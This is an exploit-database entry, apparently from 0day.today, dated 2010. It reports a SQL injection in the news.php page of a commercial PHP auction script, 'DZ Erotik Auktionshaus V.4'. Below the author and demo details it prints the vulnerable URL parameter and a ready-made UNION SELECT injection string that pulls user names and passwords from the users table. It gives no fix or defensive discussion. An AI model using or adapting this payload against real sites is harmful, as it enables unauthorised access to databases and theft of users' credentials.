DZ Erotik Auktionshaus V.4 (news.php) SQL Injection Vulnerability

2010-02-26T00:00:00
ID 1337DAY-ID-11104
Type zdt
Reporter Easy Laster
Modified 2010-02-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
DZ Erotik Auktionshaus V.4 (news.php) SQL Injection Vulnerability
=================================================================

----------------------------Information------------------------------------------------
+Name : DZ Erotik Auktionshaus V.4.rgo news.php SQL Injection
+Autor : Easy Laster
+Date   : 26.02.2010
+Script  : DZ Erotik Auktionshaus V.4.rgo
+Download : -----
+Demo : http://demo.dolorez.de/eauk-rgo/
+Price : EUR 79,99
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionshaus/news.php?id=
+Exploitable   : www.site.com/auktionshaus/news.php?id=null+union+select+1,2,concat
(name,0x3a,password),4,5+from+users#
-----------------------------------------------------------------------------------------



#  0day.today [2018-01-30]  #